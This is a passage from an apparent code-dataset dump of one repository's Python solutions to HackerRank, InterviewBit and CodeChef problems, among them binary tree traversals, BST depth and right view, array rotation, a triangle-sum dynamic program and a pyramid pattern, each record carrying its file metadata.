create(self, val): \r\n if self.root == None:\r\n self.root = Node(val)\r\n else:\r\n current = self.root\r\n \r\n while True:\r\n if val < current.info:\r\n if current.left:\r\n current = current.left\r\n else:\r\n current.left = Node(val)\r\n break\r\n elif val > current.info:\r\n if current.right:\r\n current = current.right\r\n else:\r\n current.right = Node(val)\r\n break\r\n else:\r\n break\r\n\r\n# Enter your code here. Read input from STDIN. Print output to STDOUT\r\n'''\r\nclass Node:\r\n def __init__(self,info): \r\n self.info = info \r\n self.left = None \r\n self.right = None \r\n \r\n\r\n // this is a node of the tree , which contains info as data, left , right\r\n'''\r\ndef height(root):\r\n if(root == None):\r\n return -1\r\n return max(height(root.left), height(root.right))+1\r\nfor _ in range(int(input())):\r\n n = int(input())\r\n l = list(map(int, input().split()))\r\n tree = BinarySearchTree()\r\n for i in l:\r\n tree.create(i)\r\n print(height(tree.root))\r\n\r\n"
},
{
"alpha_fraction": 0.498151570558548,
"alphanum_fraction": 0.5134010910987854,
"avg_line_length": 19.8383846282959,
"blob_id": "526768d9959c3f96c30059ee7d0819424d8e7684",
"content_id": "647fa8e55ff9b7b943c9a498ab93aa8c73b7f083",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2164,
"license_type": "no_license",
"max_line_length": 152,
"num_lines": 99,
"path": "/Tree Preorder Traversal.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nTree: Preorder Traversal\r\n1252.43 more points to get your next star!\r\nRank: 108726|Points: 947.57/2200\r\nProblem Solving\r\n\r\n Problem\r\n Submissions\r\n Leaderboard\r\n Discussions\r\n Editorial\r\n\r\nComplete the preOrder function in your editor below, which has\r\n\r\nparameter: a pointer to the root of a binary tree. It must print the values in the tree's preorder traversal as a single line of space-separated values.\r\n\r\nInput Format\r\n\r\nOur hidden tester code passes the root node of a binary tree to your preOrder function.\r\n\r\nConstraints\r\n\r\nNodes in the tree\r\n\r\nOutput Format\r\n\r\nPrint the tree's preorder traversal as a single line of space-separated values.\r\n\r\nSample Input\r\n\r\n 1\r\n \\\r\n 2\r\n \\\r\n 5\r\n / \\\r\n 3 6\r\n \\\r\n 4 \r\n\r\nSample Output\r\n\r\n1 2 5 3 4 6 \r\n\r\n\r\n\r\n\r\n\"\"\"\r\n\r\n\r\nclass Node:\r\n def __init__(self, info): \r\n self.info = info \r\n self.left = None \r\n self.right = None \r\n self.level = None \r\n\r\n def __str__(self):\r\n return str(self.info) \r\n\r\nclass BinarySearchTree:\r\n def __init__(self): \r\n self.root = None\r\n\r\n def create(self, val): \r\n if self.root == None:\r\n self.root = Node(val)\r\n else:\r\n current = self.root\r\n \r\n while True:\r\n if val < current.info:\r\n if current.left:\r\n current = current.left\r\n else:\r\n current.left = Node(val)\r\n break\r\n elif val > current.info:\r\n if current.right:\r\n current = current.right\r\n else:\r\n current.right = Node(val)\r\n break\r\n else:\r\n break\r\n\r\n\"\"\"\r\nNode is defined as\r\nself.left (the left child of the node)\r\nself.right (the right child of the node)\r\nself.info (the value of the node)\r\n\"\"\"\r\ndef preOrder(root):\r\n #Write your code here\r\n if(root == None):\r\n return \r\n print(root.info, end=\" \")\r\n preOrder(root.left)\r\n preOrder(root.right)\r\n\r\n"
},
{
"alpha_fraction": 0.45538127422332764,
"alphanum_fraction": 0.5197404026985168,
"avg_line_length": 18.544445037841797,
"blob_id": "7c8dbf1a50421acfa7b1a2cf88cd80550f776ad8",
"content_id": "a0f14be5749877677c14d2edc3081d5fca9c75d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1849,
"license_type": "no_license",
"max_line_length": 205,
"num_lines": 90,
"path": "/Largest Concatenated Number.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nLargest Concatenated Number\r\nProblem\r\nSubmissions\r\nLeaderboard\r\nDiscussions\r\nGiven an array of integers, find the largest number that can be constructed by concatenating all the elements of the given array.\r\n\r\nInput Format\r\n\r\nFirst line of input contains T - number of test cases. Its followed by 2T lines. First line of each test case contains N - size of the array and the second line contains N integers - elements of the array.\r\n\r\nConstraints\r\n\r\n1 <= T <= 1000\r\n1 <= N <= 1000\r\n0 <= ar[i] <= 1000\r\n\r\nOutput Format\r\n\r\nFor each test case, print the largest number that can be constructed by concatenating all the elements of the given array, separated by newline.\r\n\r\nSample Input 0\r\n\r\n3\r\n8\r\n49 73 58 30 72 44 78 23 \r\n4\r\n69 9 57 60 \r\n2\r\n40 4 \r\nSample Output 0\r\n\r\n7873725849443023\r\n9696057\r\n440\r\n\r\n\r\n\r\n\"\"\"\r\n\r\n\r\ndef merges(ar,l,h):\r\n if(l==h):\r\n return\r\n mid=(l+h)//2\r\n merges(ar,l,mid)\r\n merges(ar,mid+1,h)\r\n merge(ar,l,mid,h)\r\n \r\ndef merge(ar,l,mid,h):\r\n p1 = l\r\n p2 = mid+1\r\n k = 0\r\n size = h-l+1\r\n temp = [0]*size\r\n while((p1<=mid) and (p2<=h)):\r\n s1 = str(ar[p1])+str(ar[p2])\r\n s2 = str(ar[p2])+str(ar[p1])\r\n if(int(s2)>int(s1)):\r\n temp[k] = ar[p2]\r\n k = k+1\r\n p2 = p2+1\r\n else:\r\n temp[k] = ar[p1]\r\n k = k+1\r\n p1 = p1+1\r\n \r\n while(p1<=mid):\r\n temp[k] = ar[p1]\r\n k = k+1\r\n p1 = p1+1\r\n \r\n while(p2<=h):\r\n temp[k] = ar[p2]\r\n k = k+1\r\n p2 = p2+1\r\n for i in range(l,h+1):\r\n ar[i] = temp[i-l]\r\nfor _ in range(int(input())):\r\n n = int(input())\r\n A = list(map(int, input().split()))\r\n merges(A, 0 ,n-1)\r\n s = ''\r\n for i in A:\r\n s += str(i)\r\n if(int(s)==0):\r\n print(0)\r\n else:\r\n print(str(s))\r\n"
},
{
"alpha_fraction": 0.6191037893295288,
"alphanum_fraction": 0.6308962106704712,
"avg_line_length": 16.844444274902344,
"blob_id": "f35f6d8f619cff744a45c3c852bf0e4a47a5bcb5",
"content_id": "e1b059844433ac47850321562fa49fa17424a6f0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1696,
"license_type": "no_license",
"max_line_length": 175,
"num_lines": 90,
"path": "/leftrotation.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nA left rotation operation on an array shifts each of the array's elements unit to the left. For example, if left rotations are performed on array , then the array would become\r\n\r\n.\r\n\r\nGiven an array\r\nof integers and a number, , perform\r\n\r\nleft rotations on the array. Return the updated array to be printed as a single line of space-separated integers.\r\n\r\nFunction Description\r\n\r\nComplete the function rotLeft in the editor below. It should return the resulting array of integers.\r\n\r\nrotLeft has the following parameter(s):\r\n\r\n An array of integers \r\n\r\n.\r\nAn integer\r\n\r\n , the number of rotations.\r\n\r\nInput Format\r\n\r\nThe first line contains two space-separated integers\r\nand , the size of and the number of left rotations you must perform.\r\nThe second line contains space-separated integers\r\n\r\n.\r\n\r\nConstraints\r\n\r\nOutput Format\r\n\r\nPrint a single line of\r\nspace-separated integers denoting the final state of the array after performing\r\n\r\nleft rotations.\r\n\r\nSample Input\r\n\r\n5 4\r\n1 2 3 4 5\r\n\r\nSample Output\r\n\r\n5 1 2 3 4\r\n\r\n\r\n\"\"\"\r\n\r\n#!/bin/python3\r\n\r\nimport math\r\nimport os\r\nimport random\r\nimport re\r\nimport sys\r\n\r\n# Complete the rotLeft function below.\r\ndef rotLeft(a, d):\r\n k = 0\r\n d = d % len(a)\r\n temp = [0]*len(a)\r\n for i in a[d:]:\r\n temp[k] = i\r\n k += 1\r\n for i in a[0:d]:\r\n temp[k] = i\r\n k += 1 \r\n return temp\r\n\r\nif __name__ == '__main__':\r\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\r\n\r\n nd = input().split()\r\n\r\n n = int(nd[0])\r\n\r\n d = int(nd[1])\r\n\r\n a = list(map(int, input().rstrip().split()))\r\n\r\n result = rotLeft(a, d)\r\n\r\n fptr.write(' '.join(map(str, result)))\r\n fptr.write('\\n')\r\n\r\n fptr.close()\r\n"
},
{
"alpha_fraction": 0.5251655578613281,
"alphanum_fraction": 0.6033112406730652,
"avg_line_length": 17.789474487304688,
"blob_id": "6d157680dbaad81522c97dfdd7370c1e3755747b",
"content_id": "cb728d036ff477566464b2052d215456b8b85487",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1510,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 76,
"path": "/PreOrder InOrder to PostOrder.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\nPreOrder InOrder to PostOrder\r\n\r\n Problem\r\n Submissions\r\n Leaderboard\r\n Discussions\r\n\r\nGiven the preorder and inorder traversals of a binary\r\ntree with unique elements, print the PostOrder Traversals of the tree.\r\n\r\nInput Format\r\n\r\nFirst line of input contains T - number of test cases.\r\nIts followed by 3T lines. First line of each test case contains N - number\r\nof nodes in the BST. Second line contains N unique integers denoting\r\nthe preorder traversal of the tree. Third line contains N unique integers\r\ndenoting the inorder traversal of the tree.\r\n\r\nConstraints\r\n\r\n1 <= T <= 1000\r\n1 <= N <= 1000\r\n0 <= ar[i] <= 10000\r\n\r\nOutput Format\r\n\r\nFor each test case, print the PostOrder Traversal of the Binary Tree,\r\nseparated by newline.\r\n\r\nSample Input 0\r\n\r\n3\r\n7\r\n1 2 4 5 3 6 7 \r\n4 2 5 1 6 3 7 \r\n10\r\n8 5 9 7 1 12 2 4 11 3 \r\n9 5 1 7 2 12 8 4 3 11 \r\n9\r\n2 7 3 6 8 11 5 9 4 \r\n3 7 8 6 11 2 5 4 9 \r\n\r\nSample Output 0\r\n\r\n4 5 2 6 7 3 1 \r\n9 1 2 12 7 5 3 11 4 8 \r\n3 8 11 6 7 4 9 5 2 \r\n\r\n\r\n\"\"\"\r\ndef postorder(pre, ino):\r\n\r\n n = len(pre)\r\n if(n == 0):\r\n return \r\n #print(*pre)\r\n #print(*ino)\r\n root = pre[0]\r\n #print(root)\r\n pos = ino.index(root)\r\n #print(pos)\r\n postorder(pre[1:pos+1], ino[:pos])\r\n postorder(pre[pos+1:], ino[pos+1:n])\r\n print(pre[0], end =\" \")\r\n \r\n \r\n\r\n\r\nfor _ in range (int(input())):\r\n n = int(input())\r\n pre = list(map(int, input().split()))\r\n ino = list(map(int, input().split()))\r\n postorder(pre, ino)\r\n print()\r\n \r\n"
},
{
"alpha_fraction": 0.5234693884849548,
"alphanum_fraction": 0.5306122303009033,
"avg_line_length": 18.851064682006836,
"blob_id": "d492e2e23ef2f9c45e10b345f301a608c98786c6",
"content_id": "552d10e6803d16f8e7383908746219b30a9df323",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 980,
"license_type": "no_license",
"max_line_length": 114,
"num_lines": 47,
"path": "/Min Depth of Binary Tree.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\nMin Depth of Binary Tree\r\n\r\n Asked in: \r\n Facebook\r\n Amazon\r\n\r\nGiven a binary tree, find its minimum depth.\r\n\r\nThe minimum depth is the number of nodes along the shortest path from the root node down to the nearest leaf node.\r\n\r\n NOTE : The path has to end on a leaf node. \r\n\r\nExample :\r\n\r\n 1\r\n /\r\n 2\r\n\r\nmin depth = 2.\r\n\r\n\r\n\"\"\"\r\n\r\n #Definition for a binary tree node\r\n# class TreeNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.left = None\r\n# self.right = None\r\n\r\nclass Solution:\r\n # @param A : root node of tree\r\n # @return an integer\r\n def minDepth(self, A):\r\n if not A.left and not A.right:\r\n return 1\r\n \r\n if A.right and A.left:\r\n return min( self.minDepth(A.left), self.minDepth(A.right) ) + 1\r\n \r\n if A.left:\r\n return self.minDepth(A.left) + 1\r\n \r\n if A.right:\r\n return self.minDepth(A.right) + 1\r\n"
},
{
"alpha_fraction": 0.6409266591072083,
"alphanum_fraction": 0.6743886470794678,
"avg_line_length": 27.576923370361328,
"blob_id": "e32de4661279b1df596977f9ededcbbfa2ef5354",
"content_id": "7a702d806cb10e96975bcba691e7be69994f2411",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1554,
"license_type": "no_license",
"max_line_length": 296,
"num_lines": 52,
"path": "/Sums in a Triangle (DP).py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"Sums in a Triangle Problem Code: SUMTRIAN\r\nAdd problem to Todo list\r\nSubmit\r\n\r\n \r\nLet's consider a triangle of numbers in which a number appears in the first line, two numbers appear in the second line, three in the third line, etc. Develop a program which will compute the largest of the sums of numbers that appear on the paths starting from the top towards the base, so that:\r\n\r\non each path the next number is located on the row below, more precisely either directly below or below and one place to the right;\r\nthe number of rows is strictly positive, but less than 100\r\nall numbers are positive integers between 0 and 99.\r\nInput\r\nIn the first line integer n - the number of test cases (equal to about 1000). Then n test cases follow. Each test case starts with the number of lines which is followed by their content.\r\n\r\nOutput\r\nFor each test case write the determined value in a separate line.\r\n\r\nExample\r\nInput:\r\n2\r\n3\r\n1\r\n2 1\r\n1 2 3\r\n4 \r\n1 \r\n1 2 \r\n4 1 2\r\n2 3 1 1 \r\n\r\nOutput:\r\n5\r\n9\r\n\r\nWarning: large Input/Output data, be careful with certain languages\r\nAll submissions for this problem are available.\r\nAuthor:\tadmin\r\nTags:\tadmin\r\nDate Added:\t1-12-2008\r\nTime Limit:\t3 secs\r\nSource Limit:\t5000 Bytes\r\n\"\"\"\r\n\r\n# cook your dish here\r\nfor _ in range(int(input())):\r\n n = int(input())\r\n t = [] #triangle \r\n for j in range(n):\r\n t.append(list(map(int, input().split())))\r\n for j in range(n-1, -1, -1):\r\n for k in range(0,j):\r\n t[j-1][k] = t[j-1][k] + max(t[j][k],t[j][k+1])\r\n print(t[0][0])\r\n \r\n \r\n"
},
{
"alpha_fraction": 0.44040828943252563,
"alphanum_fraction": 0.45962172746658325,
"avg_line_length": 18.054216384887695,
"blob_id": "56a27202d80275979d3130854acbf28a5310df87",
"content_id": "5c3aacb7de0200ed1bbaf9f3c001414c23ae5bf5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3332,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 166,
"path": "/Right View of Tree.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\nRight View of Tree\r\n\r\n Problem\r\n Submissions\r\n Leaderboard\r\n Discussions\r\n\r\nGiven an array of unique elements, construct a Binary Search Tree\r\nand print the right-view of the tree. Right view of a Tree is the set\r\nof nodes visible when tree is viewed from right side.\r\n\r\nInput Format\r\n\r\nFirst line of input contains T - number of test cases. Its followed\r\nby 2T lines. First line of each test case contains N - number of nodes\r\nin the BST. The next line contains N unique integers - value of the nodes.\r\n\r\nConstraints\r\n\r\n1 <= T <= 1000\r\n1 <= N <= 1000\r\n0 <= ar[i] <= 10000\r\n\r\nOutput Format\r\n\r\nFor each test case, print the right-view of the Binary Search Tree,\r\nseparated by newline.\r\n\r\nSample Input 0\r\n\r\n3\r\n5\r\n1 2 3 4 5 \r\n5\r\n3 2 4 1 5 \r\n7\r\n4 5 15 0 1 7 17 \r\n\r\nSample Output 0\r\n\r\n1 2 3 4 5 \r\n3 4 5 \r\n4 5 15 17 \r\n\r\n\r\n\r\n\r\n\"\"\"\r\n\r\nclass Node:\r\n def __init__(self, info): \r\n self.info = info \r\n self.left = None \r\n self.right = None \r\n self.level = None \r\n\r\n def __str__(self):\r\n return str(self.info) \r\n\r\nclass BinarySearchTree:\r\n def __init__(self): \r\n self.root = None\r\n\r\n def create(self, val): \r\n if (self.root == None):\r\n self.root = Node(val)\r\n else:\r\n current = self.root\r\n \r\n while True:\r\n if val < current.info:\r\n if current.left:\r\n current = current.left\r\n else:\r\n current.left = Node(val)\r\n break\r\n elif val > current.info:\r\n if current.right:\r\n current = current.right\r\n else:\r\n current.right = Node(val)\r\n break\r\n else:\r\n break\r\ndef levelor(root):\r\n if root is None: \r\n return\r\n q = [] \r\n q.append(root)\r\n \r\n while(len(q)>0):\r\n k=len(q)\r\n temp=[]\r\n for i in range(0,k):\r\n x = q.pop(0)\r\n temp.append(x)\r\n if(x.left != None):\r\n q.append(x.left)\r\n if(x.right != None):\r\n q.append(x.right)\r\n print(temp[-1].info,end=\" \")\r\n # print()\r\n\r\nfor _ in range(int(input())):\r\n n = int(input())\r\n tree = BinarySearchTree()\r\n ar = list(map(int, input().split()))\r\n for i in ar:\r\n tree.create(i)\r\n levelor(tree.root)\r\n print()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\"\"\"ÏNTERVIEW BIT \"\"\"\r\n\r\n\r\n\r\n # Definition for a binary tree node\r\n# class TreeNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.left = None\r\n# self.right = None\r\n\r\nclass Solution:\r\n # @param A : root node of tree\r\n # @return a list of integers\r\n def solve(self, root):\r\n if root is None: \r\n return\r\n q = [] \r\n q.append(root)\r\n l = []\r\n while(len(q)>0):\r\n k=len(q)\r\n temp=[]\r\n for i in range(0,k):\r\n x = q.pop(0)\r\n temp.append(x.val)\r\n if(x.left != None):\r\n q.append(x.left)\r\n if(x.right != None):\r\n q.append(x.right)\r\n l.append(temp[-1])\r\n return l\r\n # print()\r\n\r\n"
},
{
"alpha_fraction": 0.5104895234107971,
"alphanum_fraction": 0.5325443744659424,
"avg_line_length": 14.899999618530273,
"blob_id": "20c39b5e32b2ef310e224cb7742f029c0f4c07dd",
"content_id": "418c37397f6eae0111e05554c7677268a921f000",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1859,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 110,
"path": "/Path to Given Node.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\"\r\nPath to Given Node\r\nAsked in: \r\nAmazon\r\nProblem Description\r\n\r\nGiven a Binary Tree A containing N nodes.\r\n\r\nYou need to find the path from Root to a given node B.\r\n\r\nNOTE:\r\n\r\nNo two nodes in the tree have same data values.\r\nYou can assume that B is present in the tree A and a path always exists.\r\n\r\n\r\nProblem Constraints\r\n1 <= N <= 105\r\n\r\n1 <= Data Values of Each Node <= N\r\n\r\n1 <= B <= N\r\n\r\n\r\n\r\nInput Format\r\nFirst Argument represents pointer to the root of binary tree A.\r\n\r\nSecond Argument is an integer B denoting the node number.\r\n\r\n\r\n\r\nOutput Format\r\nReturn an one-dimensional array denoting\r\nthe path from Root to the node B in order.\r\n\r\n\r\n\r\nExample Input\r\nInput 1:\r\n\r\n A =\r\n\r\n 1\r\n / \\\r\n 2 3\r\n / \\ / \\\r\n 4 5 6 7 \r\n\r\n\r\nB = 5\r\n\r\nInput 2:\r\n\r\n A = \r\n 1\r\n / \\\r\n 2 3\r\n / \\ . \\\r\n 4 5 . 6\r\n\r\n\r\nB = 1\r\n\r\n\r\n\r\n\r\nExample Output\r\nOutput 1:\r\n\r\n [1, 2, 5]\r\nOutput 2:\r\n\r\n [1]\r\n\r\n\r\nExample Explanation\r\nExplanation 1:\r\n\r\n We need to find the path from root node to node with data value 5.\r\n So the path is 1 -> 2 -> 5 so we will return [1, 2, 5]\r\nExplanation 2:\r\n\r\n We need to find the path from root node to node with data value 1.\r\n As node with data value 1 is the root so there is only one node in the path.\r\n So we will return [1]\r\n\r\n\r\n\r\n\r\n\"\"\"\"\r\n\r\n\r\nclass Solution:\r\n # @param A : root node of tree\r\n # @param B : integer\r\n # @return a list of integers\r\n def solve(self, A, B):\r\n ans=[]\r\n def rh(root,lis,B):\r\n if(root==None):\r\n return []\r\n if(root.val==B):\r\n lis.append(root.val)\r\n for i in lis:\r\n ans.append(i)\r\n rh(root.left,lis+[root.val],B)\r\n rh(root.right,lis+[root.val],B)\r\n rh(A,[],B)\r\n return ans\r\n"
},
{
"alpha_fraction": 0.47585228085517883,
"alphanum_fraction": 0.4978693127632141,
"avg_line_length": 21.495798110961914,
"blob_id": "929b0111d47094332130858bd5d34ea767c22464",
"content_id": "e6416a4a9501345e7f3992dff0b44028ebe1b682",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2816,
"license_type": "no_license",
"max_line_length": 213,
"num_lines": 119,
"path": "/Depth of Tree Nodes.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\nDepth of Tree Nodes\r\n\r\n Problem\r\n Submissions\r\n Leaderboard\r\n Discussions\r\n\r\nGiven an array of unique elements, construct a Binary Search Tree and for every node, print the depth of that node.\r\n\r\nInput Format\r\n\r\nFirst line of input contains T - number of test cases. Its followed by 2T lines. First line of each test case contains N - number of nodes in the BST. The next line contains N unique integers - value of the nodes.\r\n\r\nConstraints\r\n\r\nFor each test case, print the depth of every node of the Binary Search Tree, separated by newline.\r\n\r\n1 <= T <= 1000\r\n1 <= N <= 1000\r\n0 <= ar[i] <= 10000\r\n\r\nOutput Format\r\n\r\nFor each test case, print N integers, where the ith integer denotes the depth of A[i] in the Binary Search Tree, separated by newline.\r\n\r\nSample Input 0\r\n\r\n3\r\n5\r\n1 2 3 4 5 \r\n5\r\n3 2 4 1 5 \r\n7\r\n4 5 15 0 1 7 17 \r\n\r\nSample Output 0\r\n\r\n0 1 2 3 4 \r\n0 1 1 2 2 \r\n0 1 2 1 2 3 3 \r\n\r\n\r\n\"\"\"\r\n\r\nclass Node:\r\n def __init__(self, info): \r\n self.info = info \r\n self.left = None \r\n self.right = None \r\n self.level = None \r\n\r\n def __str__(self):\r\n return str(self.info) \r\n\r\nclass BinarySearchTree:\r\n def __init__(self): \r\n self.root = None\r\n\r\n def create(self, val): \r\n if self.root == None:\r\n self.root = Node(val)\r\n else:\r\n current = self.root\r\n \r\n while True:\r\n if val < current.info:\r\n if current.left:\r\n current = current.left\r\n else:\r\n current.left = Node(val)\r\n break\r\n elif val > current.info:\r\n if current.right:\r\n current = current.right\r\n else:\r\n current.right = Node(val)\r\n break\r\n else:\r\n break\r\n\r\n# Enter your code here. Read input from STDIN. Print output to STDOUT\r\n'''\r\nclass Node:\r\n def __init__(self,info): \r\n self.info = info \r\n self.left = None \r\n self.right = None \r\n \r\n\r\n // this is a node of the tree , which contains info as data, left , right\r\n \r\n'''\r\ndef search(r, key, v):\r\n t = r \r\n if(t == None):\r\n return v\r\n if(t.info == key):\r\n return v\r\n if(t.info > key):\r\n v = v + 1\r\n return search(t.left, key, v)\r\n else:\r\n v = v + 1\r\n return search(t.right, key, v)\r\n \r\n\r\n \r\nfor _ in range(int(input())):\r\n n = int(input())\r\n l = list(map(int, input().split()))\r\n tree = BinarySearchTree()\r\n for i in l:\r\n tree.create(i)\r\n for i in range(n):\r\n d = search(tree.root, l[i], 0)\r\n print(d, end = \" \")\r\n print()\r\n \r\n \r\n"
},
{
"alpha_fraction": 0.5062034726142883,
"alphanum_fraction": 0.522332489490509,
"avg_line_length": 19.13157844543457,
"blob_id": "41ae9d7a555fb175b2924a0128adca62f649ecf2",
"content_id": "ee73f8fc3014519dbadf25e9b5ff507bdc0c40cd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 806,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 38,
"path": "/Remove Duplicates from Sorted List.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\nRemove Duplicates from Sorted List\r\n\r\n Asked in: \r\n Microsoft\r\n VMWare\r\n\r\nGiven a sorted linked list, delete all duplicates such that each element appear only once.\r\n\r\nFor example,\r\nGiven 1->1->2, return 1->2.\r\nGiven 1->1->2->3->3, return 1->2->3.\r\n\r\n\r\n\"\"\"\r\n\r\n\r\n\r\n# Definition for singly-linked list.\r\n# class ListNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.next = None\r\n\r\nclass Solution:\r\n # @param A : head node of linked list\r\n # @return the head node in the linked list\r\n def deleteDuplicates(self, A):\r\n if(A == None):\r\n return A\r\n temp = A\r\n while(A.next != None):\r\n if(A.next.val == A.val):\r\n A.next = A.next.next\r\n else:\r\n A = A.next\r\n return temp\r\n \r\n"
},
{
"alpha_fraction": 0.5526315569877625,
"alphanum_fraction": 0.5714285969734192,
"avg_line_length": 10.97560977935791,
"blob_id": "666657e60207a8ed7a4eaa16470a983bf270179e",
"content_id": "8ae81801bec3b336b6f7953a847229e5b836225a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 532,
"license_type": "no_license",
"max_line_length": 74,
"num_lines": 41,
"path": "/Print pyramid pattern.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nPrint pyramid pattern\r\nProblem\r\nSubmissions\r\nLeaderboard\r\nDiscussions\r\nPrint pyramid pattern. See example for more details.\r\n\r\nInput Format\r\n\r\nFirst line of input contains a single integer N - the size of the pyramid.\r\n\r\nConstraints\r\n\r\n1 <= N <= 50\r\n\r\nOutput Format\r\n\r\nFor the given integer, print pyramid pattern.\r\n\r\nSample Input 0\r\n\r\n5\r\nSample Output 0\r\n\r\n *\r\n ***\r\n *****\r\n *******\r\n*********\r\n\r\n\"\"\"\r\n\r\n\r\nn = int(input())\r\nl = n-1\r\ni = 1\r\nfor j in range(n):\r\n print(\" \"*l,\"*\"*i,\" \"*l,sep=\"\")\r\n l=l-1\r\n i=i+2\r\n"
},
{
"alpha_fraction": 0.49738219380378723,
"alphanum_fraction": 0.5122163891792297,
"avg_line_length": 21.54166603088379,
"blob_id": "916e2bb4c0a65a983b367c6ba2b54729a3b10cf1",
"content_id": "e69871abea90641ed8347084773f56f382d5cd2f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1146,
"license_type": "no_license",
"max_line_length": 180,
"num_lines": 48,
"path": "/Find Duplicate in Array.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nFind Duplicate in Array\r\nAsked in: \r\nAmazon\r\nVMWare\r\nRiverbed\r\nGiven a read only array of n + 1 integers between 1 and n, find one number that repeats in linear time using less than O(n) space and traversing the stream sequentially O(1) times.\r\n\r\nSample Input:\r\n\r\n[3 4 1 4 1]\r\nSample Output:\r\n\r\n1\r\nIf there are multiple possible answers ( like in the sample case above ), output any one.\r\n\r\nIf there is no duplicate, output -1\r\n\r\n\r\nclass Solution:\r\n # @param A : tuple of integers\r\n # @return an integer\r\n def repeatedNumber(self, A):\r\n A = list(A)\r\n n = len(A)\r\n for i in range(n):\r\n index = A[i]%n\r\n A[index] = A[index] + n\r\n \r\n for j in range(n):\r\n if A[j]//n > 1:\r\n return j\r\n \r\n return -1\r\n \r\n\"\"\"\r\nclass Solution:\r\n # @param A : tuple of integers\r\n # @return an integer\r\n def repeatedNumber(self, A):\r\n lenA = len(A)\r\n temp = [0]*lenA\r\n for i in A:\r\n if temp[i - 1]:\r\n return i\r\n else:\r\n temp[i - 1] = 1\r\n return -1\r\n \r\n\r\n"
},
{
"alpha_fraction": 0.6485743522644043,
"alphanum_fraction": 0.6681552529335022,
"avg_line_length": 18.286712646484375,
"blob_id": "331163a6160633bb93e65aad0d9a2665431af621",
"content_id": "d460a4e52c01c17ac4516daaaa350e965fb62a42",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2911,
"license_type": "no_license",
"max_line_length": 522,
"num_lines": 143,
"path": "/Migratory birds (count array).py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nMigratory Birds\r\n173.48 more points to get your gold badge!\r\nRank: 167259|Points: 676.52/850\r\nProblem Solving\r\n\r\n Problem\r\n Submissions\r\n Leaderboard\r\n Discussions\r\n Editorial\r\n\r\nYou have been asked to help study the population of birds migrating across the continent. Each type of bird you are interested in will be identified by an integer value. Each time a particular kind of bird is spotted, its id number will be added to your array of sightings. You would like to be able to find out which type of bird is most common given a list of sightings. Your task is to print the type number of that bird and if two or more types of birds are equally common, choose the type with the smallest ID number.\r\n\r\nFor example, assume your bird sightings are of types\r\n. There are two each of types and , and one sighting of type . Pick the lower of the two types seen twice: type\r\n\r\n.\r\n\r\nFunction Description\r\n\r\nComplete the migratoryBirds function in the editor below. It should return the lowest type number of the most frequently sighted bird.\r\n\r\nmigratoryBirds has the following parameter(s):\r\n\r\n arr: an array of integers representing types of birds sighted\r\n\r\nInput Format\r\n\r\nThe first line contains an integer denoting\r\n, the number of birds sighted and reported in the array .\r\nThe second line describes as\r\n\r\nspace-separated integers representing the type numbers of each bird sighted.\r\n\r\nConstraints\r\n\r\nIt is guaranteed that each type is , , , , or\r\n\r\n .\r\n\r\nOutput Format\r\n\r\nPrint the type number of the most common bird; if two or more types of birds are equally common, choose the type with the smallest ID number.\r\n\r\nSample Input 0\r\n\r\n6\r\n1 4 4 4 5 3\r\n\r\nSample Output 0\r\n\r\n4\r\n\r\nExplanation 0\r\n\r\nThe different types of birds occur in the following frequencies:\r\n\r\n Type 